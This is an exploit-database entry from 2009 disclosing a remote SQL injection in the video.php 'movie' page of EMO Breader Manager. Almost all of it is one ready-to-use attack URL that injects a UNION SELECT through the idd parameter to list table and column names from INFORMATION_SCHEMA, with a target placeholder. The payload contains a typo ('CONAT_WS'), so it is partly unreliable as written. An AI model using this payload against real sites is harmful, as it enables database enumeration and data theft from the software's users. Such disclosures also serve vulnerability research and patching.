id: 5694
date: 08/24/2009
title: EMO Breader Manager (video.php movie) SQL Injection Vulnerability
author: Mr.SQL
cves: 

=================================================================
EMO Breader Manager (video.php movie) SQL Injection Vulnerability
=================================================================

#########################
## Remote SQL Injection Vulnerability ( video.php movie )
##
## EMO Breader Manager
##
## http://www.emophp.com
##
########################
########################
##
## -[[: ExploiteS :]]-
##
## www.TraGeT.CoM/video.php?movie=<<NAME FILE>>.wmv&idd=-1+UNION+SELECT+1,2,CONAT_WS(0x3a,table_name,column_name),4,5+FROM+INFORMATION_SCHEMA.COLUMNS--
##
########################
########################
 

#########################################################################################################
#########################################################################################################



#  0day.today [2023-03-21]  #